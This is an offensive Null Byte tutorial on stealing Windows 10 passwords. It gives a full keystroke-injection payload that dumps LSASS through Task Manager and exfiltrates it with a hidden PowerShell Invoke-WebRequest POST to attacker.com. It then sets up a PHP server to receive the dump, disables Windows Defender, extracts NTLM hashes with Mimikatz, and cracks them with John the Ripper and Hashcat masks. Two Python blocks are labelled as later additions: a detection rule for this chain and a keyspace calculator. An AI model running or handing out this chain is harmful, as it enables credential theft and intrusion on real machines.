
Dumping NTLM Hashes & Cracking Windows Passwords « Null Byte :: WonderHowTo



Windows 10 passwords stored as NTLM hashes (or, more accurately, NT hashes) can be dumped in seconds and transferred to an attacker's system. The hashes can then be brute-forced to reveal the plaintext passwords using a combination of tools, including Mimikatz, ProcDump, John the Ripper, and Hashcat.

Before We Get Started

The Local Security Authority Subsystem Service (LSASS) is an integral part of the Windows operating system.

LSASS is responsible for domain authentication, Active Directory management, and security policy enforcement. It spawns the processes responsible for authenticating users with NTLM and verifies the validity of logins. Because it is so critical to the operating system's functionality, hackers often name malicious executables after the process.

Mimikatz & ProcDump

Mimikatz, created by gentilkiwi, can be used to extract password hashes, Kerberos tickets, and PIN codes from the memory of Windows 10. Since its inception, Mimikatz has made worrying headlines worldwide and has become known for its ability to extract sensitive credentials from a running Windows computer.

Windows Defender and antivirus software have become more effective at detecting Mimikatz executions and signatures (see below).

VirusTotal detection rates for the latest Mimikatz version.

In combination with Mimikatz, hackers now use ProcDump, a stand-alone executable designed for administrators to monitor application crashes.

ProcDump is used to extract the LSASS dump, which is then moved to an offline Windows 10 computer and parsed with Mimikatz. This is still an effective way to extract credentials from Windows 10 because ProcDump is a signed Microsoft binary and is not flagged by most antivirus programs (see below).

Windows 10's Task Manager can also be used to dump LSASS memory without the help of Mimikatz or ProcDump. Below is an example of a mousejack payload designed to extract and exfiltrate the LSASS dump using only keystroke injection and PowerShell. The attack completes in under ten seconds (it was slowed down in places for readability).

Task Manager is opened from the Run window with administrator privileges. The screen goes blank for a second because of the User Account Control (UAC) prompt, which prevents the GIF recorder from capturing the screen. The Local Security Authority Process (lsass.exe) is then located in the process list and dumped (by default) to the %TEMP% directory. A PowerShell one-liner is then executed entirely through the Run window. The LSASS dump is compressed into a ZIP file and sent to the attacker's server.

At this point, the attacker can use Mimikatz on an offline Windows 10 computer or a virtual machine (with no antivirus software installed) to extract the password hashes.

Step 1: Create the Keystroke Injection Payload

The following keystroke injection payload can be executed using MouseJack vulnerabilities or a USB Rubber Ducky.

While MouseJack vulnerabilities became known a few years ago, tens of millions of keyboards and mice (including Logitech devices) are still susceptible to keystroke injection. As Marcus Mengs, creator of P4wnP1, demonstrates in his proof-of-concept video, Logitech dongles are still vulnerable to remote attacks.

REM For clarity, a 2.5 second delay was added to the start of the payload
REM to allow the USB Rubber Ducky to mount. This initial delay is not
REM required for mousejack attacks.
DELAY 2500

REM Opens the Run command window.
GUI r

REM Wait 1 second for the Run window to open.
DELAY 1000

REM Type "taskmgr" (i.e., Task Manager) into the Run window.
STRING taskmgr

REM Delay for 0.5 seconds.
DELAY 500

REM The CTRL+SHIFT+ENTER key combination is pressed to invoke the
REM User Account Control (UAC) prompt. This causes taskmgr to open
REM with administrator privileges.
CTRL-SHIFT ENTER

REM Allow the UAC window to pop up. This may take a few seconds
REM on some Windows 10 computers.
DELAY 2500

REM The ALT+y keyboard shortcut accepts and bypasses the User Account
REM Control prompt.
ALT y

REM Wait a few seconds for Task Manager to fully open with
REM administrator privileges. This took (on average) 5.5 seconds in my
REM tests. In some scenarios with high-end CPUs, this delay can be
REM significantly lower.
DELAY 5500

REM Press the down arrow to move from the toolbar into the
REM list of active background processes.
DOWNARROW

REM Type "local" to jump down and highlight "Local Security
REM Authority Process".
STRING local

REM The SHIFT+F10 shortcut invokes the right-click options
REM menu.
SHIFT F10

REM Wait 1.2 seconds for the options menu to fully open.
DELAY 1200

REM Press the down arrow four times to highlight "Create
REM dump file."
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW

REM Press Enter to select "Create dump file."
ENTER

REM Wait 3.5 seconds for the dump file to be created and saved
REM in the %TEMP% directory.
DELAY 3500

REM Press Enter to select "OK" and close the dump popup window.
ENTER

REM ALT+F4 combination to close the Task Manager window.
ALT F4

REM Wait 0.7 seconds for Task Manager to close.
DELAY 700

REM Reopen the Run command window.
GUI r

REM Wait 0.7 seconds for the Run window to open.
DELAY 700

REM PowerShell one-liner for compressing and exfiltrating the LSASS
REM dump file. Every part of the one-liner is explained in greater
REM detail below.
STRING powershell -ep bypass /w 1 /C $t=$env:temp;$l='lsass.DMP';compress-archive -path $t\$l -destinationpath $t\a.zip;iwr attacker.com/i.php -method POST -Infile $t\a.zip

REM Press Enter to execute the PowerShell one-liner.
ENTER

The PowerShell payload consists of several commands concatenated with semicolons:

  • powershell -ep bypass /w 1 /C – The ExecutionPolicy (-ep) is set to "bypass", which allows PowerShell to run on Windows despite Defender and some antivirus software. The WindowStyle (/w) is set to "1" (hidden), which immediately hides the PowerShell popup terminal.
  • $t=$env:temp; – The target's temporary directory is stored in $t. Using single-letter variables helps shorten the overall payload length, which is more efficient than typing "C:\Users\%USERNAME%\AppData\Local\Temp" over and over again.
  • $l='lsass.DMP'; – The lsass.DMP filename is stored in the $l variable. This filename is set automatically by Task Manager.
  • compress-archive -path $t\$l -destinationpath $t\a.zip; – The Compress-Archive PowerShell cmdlet compresses lsass.DMP (-path) into the a.zip file (-destinationpath).
  • iwr attacker.com/i.php -method POST -Infile $t\a.zip – Invoke-WebRequest (iwr) sends a.zip (-Infile) to the attacker's server as a POST request. Make sure "attacker.com" is changed to the Kali machine's local IP address or the virtual private server's address.
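As an added defensive illustration (not part of the original post), the following Python snippet shows what the chain above looks like in endpoint telemetry and how a detection rule can key on it: Task Manager writing lsass.DMP into %TEMP%, followed by a hidden (/w 1), policy-bypassing (-ep bypass) PowerShell launch that references the dump, Compress-Archive and an Invoke-WebRequest POST. The log records are constructed for the demo; the field names follow Sysmon's ProcessCreate (event 1) and FileCreate (event 11) naming.

```python
import re
from dataclasses import dataclass

# Traits of the one-liner above: policy bypass, hidden window, the Task Manager
# dump name, Compress-Archive, and an Invoke-WebRequest POST.
PS_TRAITS = [
    re.compile(r"(?:^|\s)[-/](?:ep|executionpolicy)\s+bypass", re.I),
    re.compile(r"(?:^|\s)[-/]w(?:indowstyle)?\s+(?:1|hidden)", re.I),
    re.compile(r"lsass\.dmp", re.I),
    re.compile(r"compress-archive", re.I),
    re.compile(r"\b(?:iwr|invoke-webrequest)\b.*-method\s+post", re.I),
]
DUMP_PATH = re.compile(r"\\temp\\lsass\.dmp$", re.I)  # Task Manager's default dump path

@dataclass
class Event:
    event_id: int              # Sysmon ids: 1 = ProcessCreate, 11 = FileCreate
    image: str                 # process that generated the event
    command_line: str = ""     # ProcessCreate only
    target_filename: str = ""  # FileCreate only

def is_taskmgr_lsass_dump(ev: Event) -> bool:
    """FileCreate of %TEMP%\\lsass.DMP by Taskmgr.exe ("Create dump file")."""
    return (ev.event_id == 11 and ev.image.lower().endswith("taskmgr.exe")
            and DUMP_PATH.search(ev.target_filename) is not None)

def score_powershell(ev: Event) -> int:
    """Number of one-liner traits present in a PowerShell ProcessCreate."""
    if ev.event_id != 1 or not ev.image.lower().endswith("powershell.exe"):
        return 0
    return sum(1 for trait in PS_TRAITS if trait.search(ev.command_line))

def detect(events: list, threshold: int = 3) -> list:
    """Walk events in order: report the dump, and flag PowerShell launches that
    match at least `threshold` traits (as the full chain if a dump came first)."""
    alerts, dump_seen = [], False
    for ev in events:
        if is_taskmgr_lsass_dump(ev):
            dump_seen = True
            alerts.append(f"lsass minidump written by Task Manager: {ev.target_filename}")
        score = score_powershell(ev)
        if score >= threshold:
            kind = "dump exfil chain" if dump_seen else "suspicious PowerShell"
            alerts.append(f"{kind} (score {score}): {ev.command_line[:40]}...")
    return alerts

# Constructed sample telemetry (not real logs) mirroring the payload above.
SAMPLE = [
    Event(1, r"C:\Windows\System32\Taskmgr.exe", "taskmgr"),
    Event(11, r"C:\Windows\System32\Taskmgr.exe",
          target_filename=r"C:\Users\victim\AppData\Local\Temp\lsass.DMP"),
    Event(1, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          "powershell -ep bypass /w 1 /C $t=$env:temp;$l='lsass.DMP';"
          "compress-archive -path $t\\$l -destinationpath $t\\a.zip;"
          "iwr attacker.com/i.php -method POST -Infile $t\\a.zip"),
    Event(1, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          "powershell -c Get-Date"),  # routine admin use; must not alert
]
if __name__ == "__main__":
    print(*detect(SAMPLE), sep="\n")
```

The trait score is deliberately a count rather than a single signature, so renaming the ZIP or swapping iwr for curl still leaves enough of the chain to alert.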

Step 2: Intercepting the LSASS Dump

Before performing the keystroke injection, a PHP server is required to intercept the exfiltrated dump.

The keystroke payload expects a server listening on port 80. In this example, Kali Linux is used on a local network for simplicity, so root privileges are already in use. Setting up on a virtual private server likewise requires root to open a listening service on port 80.

Non-Kali users can start by elevating with the following command.

  ~$ sudo su

Then create a directory named "phpServer/" with the mkdir command.

  ~$ mkdir phpServer/

Use the cd command to change into the phpServer/ directory.

  ~$ cd phpServer/

Create a file named "i.php" with nano.

  ~$ nano i.php

Paste the following PHP script into the nano terminal. When done, press Ctrl+x, then y, then Enter to save and exit nano.

   

This simple PHP script catches incoming ZIP files and does not need to be modified in any way to work. When the Windows 10 target sends a ZIP file, the PHP server stores the data using the current time as the file name.

Start the PHP server with the command php -S 0.0.0.0:80. The -S tells PHP to start its built-in web server, while 0.0.0.0 instructs it to listen on every IPv4 interface.

  ~$ php -S 0.0.0.0:80

PHP 7.3.0-2 Development Server started
Listening on http://0.0.0.0:80
Document root is /root/phpServer
Press Ctrl-C to quit.

Step 3: Extract the Hashes with Mimikatz

After the .zip file has been intercepted, move it to a Windows 10 computer or virtual machine and extract it to find the lsass.DMP file.

Disable Windows Defender and other security features before downloading Mimikatz. Open the Start menu and search for "Virus".

Click "Virus & threat protection settings" and disable all available options. Alternatively, a virtual machine without Windows Defender or SmartScreen can be set up for Mimikatz activities.

At the time of this writing, the latest version of Mimikatz is 2.2.0 (the Carlos update). Open a web browser and navigate to its GitHub repository to find the latest release of mimikatz_trunk.zip.

After unzipping the Mimikatz archive, open a PowerShell terminal. Use the following command to run mimikatz.exe; the mimikatz prompt appears.

  PS C:\> & C:\Users\$env:username\PATH\TO\MIMIKATZ\x64\mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #18362 Aug 13 2019 01:35:04
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com ***/

mimikatz #

The sekurlsa::minidump command below loads lsass.DMP into Mimikatz.

  mimikatz # sekurlsa::minidump C:\Users\%USERNAME%\Documents\lsass.DMP

Switch to MINIDUMP : 'C:\Users\tokyoneon\Documents\lsass.DMP'

Then use the sekurlsa::logonPasswords command to extract the hashed credentials. Since Windows 8, plaintext passwords are no longer stored in memory without further changes to the operating system. However, that does not mean Windows 10 hashes cannot be brute-forced and cracked with ease. On line 12 we find the hashed password in NTLM format.

  mimikatz # sekurlsa::logonPasswords

Opening : 'C:\Users\tokyoneon\Documents\lsass.DMP' file for minidump...

1  Authentication Id : 0 ; 102597 (00000000:000190c5)
2  Session           : Interactive from 1
3  User Name         : tokyoneon
4  Domain            : MSEDGEWIN10
5  Logon Server      : MSEDGEWIN10
6  Logon Time        : 31.05.2013 01:01:05
7  SID               : S-1-5-21-3859058339-3768143778-240673529-1000
8          msv :
9           [00000003] Primary
10          * Username   : tokyoneon
11          * Domain     : MSEDGEWIN10
12          * NTLM       : 7b5e40a5b7b17972ad793b9fc868a66e
13          * SHA1       : 6076b8f4d982b55097f910b3fb5a81c801954406
14         tspkg :
15         wdigest :
16          * Username   : tokyoneon
17          * Domain     : MSEDGEWIN10
18          * Password   : (null)
19         kerberos :
20          * Username   : tokyoneon
21          * Domain     : MSEDGEWIN10
22          * Password   : (null)
23         ssp :
24         credman :

25 Authentication Id : 0 ; 102306 (00000000:00018fa2)
26 Session           : Interactive from 1
27 User Name         : tokyoneon
28 Domain            : MSEDGEWIN10
29 Logon Server      : MSEDGEWIN10
30 Logon Time        : 31.05.2013 01:01:05
31 SID               : S-1-5-21-3859058339-3768143778-240673529-1000
32         msv :
33          [00000003] Primary
34          * Username   : tokyoneon
35          * Domain     : MSEDGEWIN10
36          * NTLM       : 7b5e40a5b7b17972ad793b9fc868a66e
37          * SHA1       : 6076b8f4d982b55097f910b3fb5a81c801954406
38         tspkg :
39         wdigest :
40          * Username   : tokyoneon
41          * Domain     : MSEDGEWIN10
42          * Password   : (null)
43         kerberos :
44          * Username   : tokyoneon
45          * Domain     : MSEDGEWIN10
46          * Password   : (null)
47         ssp :
48         credman :

49 Authentication Id : 0 ; 74052 (00000000:00012144)
50 Session           : Service from 0
51 User Name         : sshd_server
52 Domain            : MSEDGEWIN10
53 Logon Server      : MSEDGEWIN10
54 Logon Time        : 31.05.2013 01:01:04
55 SID               : S-1-5-21-3859058339-3768143778-240673529-1003
56         msv :
57          [00000003] Primary
58          * Username   : sshd_server
59          * Domain     : MSEDGEWIN10
60          * NTLM       : 8d0a16cfc061c3359db455d00ec27035
61          * SHA1       : 94bd2df8ae5cadbbb5757c3be01dd40c27f9362f
62         tspkg :
63         wdigest :
64          * Username   : sshd_server
65          * Domain     : MSEDGEWIN10
66          * Password   : (null)
67         kerberos :
68          * Username   : sshd_server
69          * Domain     : MSEDGEWIN10
70          * Password   : (null)
71         ssp :
72         credman :

mimikatz #

Step 4: Brute-Forcing the NTLM Hash

Research has shown that most passwords consist of six to eight characters and end with two digits.

As a small experiment, I wanted to know how long a Raspberry Pi 3B+, a common Intel i7 CPU, and a GeForce GTX GPU would each take to crack the same hash, consisting of six random characters followed by two random digits (for example: nchfyr56).

1. Brute-Force with a Raspberry Pi 3B+ (John the Ripper)

After installing John the Ripper on a Raspberry Pi 3B+, the password (nchfyr56) was cracked in just over five hours. Given that most passwords are eight characters long, mask attacks on a Raspberry Pi are surprisingly practical for brute-forcing NTLM hashes.

  ~$ john --mask='?l?l?l?l?l?l?d?d' --format=NT /root/Desktop/hash

Using default input encoding: UTF-8
Loaded 1 password hash (NT [MD4 32/32])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status

nchfyr56         (?)

1g 0:05:19:24 DONE (2018-06-22 16:36) 0.000052g/s 1389Kp/s 1389Kc/s 1389KC/s achfyr56..zuhfyr56
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed

2. Brute-Force with an Intel i7 CPU (Hashcat CPU)

Cracking the same NTLM hash on an old Intel i7 took only three minutes, with an estimated fifteen minutes to exhaust the entire keyspace.

  ~$ hashcat /tmp/hash -m 1000 -a 3 ?l?l?l?l?l?l?d?d

hashcat (v5.1.0) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: Intel(R) Core(TM) i7-3537U CPU @ 2.00GHz, 2048/5809 MB allocatable, 4MCU

7b5e40a5b7b17972ad793b9fc868a66e:nchfyr56

Session..........: hashcat
Status...........: Cracked
Hash.Type........: NTLM
Hash.Target......: 7b5e40a5b7b17972ad793b9fc868a66e
Time.Started.....: Fri Aug 31 21:48:25 2019 (2 mins, 50 secs)
Time.Estimated...: Fri Aug 31 21:51:15 2019 (0 secs)
Guess.Mask.......: ?l?l?l?l?l?l?d?d [8]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 35719.8 kH/s (7.23ms) @ Accel:512 Loops:128 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 6049366016/30891577600 (19.58%)
Rejected.........: 0/6049366016 (0.00%)
Restore.Point....: 344064/1757600 (19.58%)
Restore.Sub.#1...: Salt:0 Amplifier:896-1024 Iteration:0-128
Candidates.#1....: hstrxp56 -> tjoqxn56

Started: Fri Aug 31 21:48:09 2019
Stopped: Fri Aug 31 21:51:16 2019

3. Brute-Force with a GeForce GTX GPU (Hashcat GPU)

The NTLM hash was cracked in under a second. This was achieved with a relatively modest GeForce GTX 1060 GPU.

  ~$ hashcat /tmp/hash -m 1000 -a 3 ?l?l?l?l?l?l?d?d

OpenCL Platform #1: NVIDIA Corporation
======================================
* Device #1: GeForce GTX 1060 3GB, 754/3018 MB allocatable, 9MCU

7b5e40a5b7b17972ad793b9fc868a66e:nchfyr56

Session..........: hashcat
Status...........: Cracked
Hash.Type........: NTLM
Hash.Target......: 7b5e40a5b7b17972ad793b9fc868a66e
Time.Started.....: Fri Aug 31 03:00:38 2019 (0 secs)
Time.Estimated...: Fri Aug 31 03:00:38 2019 (0 secs)
Guess.Mask.......: ?l?l?l?l?l?l?d?d [8]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 4658.0 MH/s (7.06ms) @ Accel:128 Loops:32 Thr:1024 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 1094713344/30891577600 (3.54%)
Rejected.........: 0/1094713344 (0.00%)
Restore.Point....: 0/1757600 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:896-928 Iteration:0-32
Candidates.#1....: hstera12 -> eusind80
Hardware.Mon.#1..: Temp: 34c Fan: 25% Util: 92% Core:1898MHz Mem:3802MHz Bus:16

Started: Fri Aug 31 03:00:34 2019
Stopped: Fri Aug 31 03:00:39 2019

When a stronger password of eight characters plus two digits (for example, Psjhfhdd48) was tested against the GPU, the hash was cracked in under twenty-five minutes.

  ~$ hashcat /tmp/hash2 -w4 -O -m 1000 -a 3 ?u?l?l?l?l?l?l?l?d?d

OpenCL Platform #1: NVIDIA Corporation
======================================
* Device #1: GeForce GTX 1060 3GB, 754/3018 MB allocatable, 9MCU

30346ad7463810ea4d5a58090611e368:Psjhfhdd48

Session..........: hashcat
Status...........: Cracked
Hash.Type........: NTLM
Hash.Target......: 30346ad7463810ea4d5a58090611e368
Time.Started.....: Fri Aug 31 03:19:11 2019 (23 mins, 28 secs)
Time.Estimated...: Fri Aug 31 03:42:39 2019 (0 secs)
Guess.Mask.......: ?u?l?l?l?l?l?l?l?d?d [10]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 12459.0 MH/s (97.89ms) @ Accel:256 Loops:676 Thr:1024 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 17567648317440/20882706457600 (84.13%)
Rejected.........: 0/17567648317440 (0.00%)
Restore.Point....: 25985286144/30891577600 (84.12%)
Restore.Sub.#1...: Salt:0 Amplifier:0-676 Iteration:0-676
Candidates.#1....: Mackuobd48 -> Xzkmatgd48
Hardware.Mon.#1..: Temp: 73c Fan: 50% Util:100% Core:1835MHz Mem:3802MHz Bus:16

Started: Fri Aug 31 03:19:09 2019
Stopped: Fri Aug 31 03:42:40 2019

NTLM hashes with even greater entropy (eight characters + four digits) were estimated to take about two days to crack.

  ~$ hashcat /tmp/hash3 -w4 -O -m 1000 -a 3 ?u?l?l?l?l?l?l?l?d?d?d?d

Session..........: hashcat
Status...........: Running
Hash.Type........: NTLM
Hash.Target......: aa110854b242ed77c07be54e62611464
Time.Started.....: Fri Aug 31 03:43:40 2019 (45 secs)
Time.Estimated...: Sun Sep  2 01:48:09 2019 (1 day, 22 hours)
Guess.Mask.......: ?u?l?l?l?l?l?l?l?d?d?d?d [12]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 12589.8 MH/s (96.68ms) @ Accel:256 Loops:676 Thr:1024 Vec:1
Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 559804317696/2088270645760000 (0.03%)
Rejected.........: 0/559804317696 (0.00%)
Restore.Point....: 828112896/3089157760000 (0.03%)
Restore.Sub.#1...: Salt:0 Amplifier:0-676 Iteration:0-676
Candidates.#1....: Maecdesr2000 -> Xzoejixr2000
Hardware.Mon.#1..: Temp: 65c Fan: 38% Util:100% Core:1847MHz Mem:3802MHz Bus:16

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>

For hackers with dedicated brute-force rigs, two days is very realistic. With a cluster of high-end GPUs, an attacker can easily crack any hash from an even larger keyspace.
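To put the timings above on a common footing, here is an added Python helper (not from the original post) that computes the keyspace of each hashcat mask used on this page and the worst-case time to exhaust it at the speeds the sessions reported (1389 Kp/s for John on the Pi, 35719.8 kH/s on the i7, 12589.8 MH/s on the GTX 1060 with -w4 -O). Charset sizes are hashcat's built-ins; the rig labels are my own, the speeds are copied from the outputs above.

```python
# hashcat's built-in charsets: ?l lowercase, ?u uppercase, ?d digits,
# ?s specials (33), ?a all printable ASCII (95).
CHARSET_SIZE = {"l": 26, "u": 26, "d": 10, "s": 33, "a": 95}

def keyspace(mask: str) -> int:
    """Number of candidates a mask covers: the product of its charset sizes,
    e.g. ?l?l?l?l?l?l?d?d -> 26**6 * 10**2 = 30,891,577,600."""
    if len(mask) % 2 or any(mask[i] != "?" for i in range(0, len(mask), 2)):
        raise ValueError(f"malformed mask: {mask!r}")
    total = 1
    for i in range(1, len(mask), 2):
        if mask[i] not in CHARSET_SIZE:
            raise ValueError(f"unknown charset ?{mask[i]} in {mask!r}")
        total *= CHARSET_SIZE[mask[i]]
    return total

def seconds_to_exhaust(mask: str, hashes_per_second: float) -> float:
    """Worst case: every candidate in the mask is tried before the hit."""
    return keyspace(mask) / hashes_per_second

def human(seconds: float) -> str:
    for unit, size in (("d", 86400), ("h", 3600), ("m", 60)):
        if seconds >= size:
            return f"{seconds / size:.1f}{unit}"
    return f"{seconds:.1f}s"

# NTLM (-m 1000) speeds reported by the sessions on this page.
SPEEDS = {
    "Raspberry Pi 3B+ (john)":           1389e3,     # 1389Kp/s
    "Intel i7-3537U (hashcat)":          35719.8e3,  # 35719.8 kH/s
    "GeForce GTX 1060 (hashcat -w4 -O)": 12589.8e6,  # 12589.8 MH/s
}
# The three masks from the sessions above.
MASKS = ["?l?l?l?l?l?l?d?d", "?u?l?l?l?l?l?l?l?d?d", "?u?l?l?l?l?l?l?l?d?d?d?d"]

def crack_table() -> dict:
    """{mask: {rig: seconds}} for every mask/rig pair above."""
    return {m: {rig: seconds_to_exhaust(m, hps) for rig, hps in SPEEDS.items()}
            for m in MASKS}

if __name__ == "__main__":
    for mask, rigs in crack_table().items():
        print(f"{mask:26} keyspace={keyspace(mask):,}")
        for rig, secs in rigs.items():
            print(f"   {rig:34} {human(secs):>8}")
```

The figures reproduce the page's estimates (about fifteen minutes on the i7 for the first mask, just under two days on the GPU for the last), which is the quickest way to judge how much a password policy buys against a given cracking budget.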

Follow me until next time on Twitter @tokyoneon_ and GitHub. And as always, leave a comment below or write me a message on Twitter if you have questions.


Cover photo by Alex Kotliarskyi/Unsplash; screenshots by tokyoneon/Null Byte



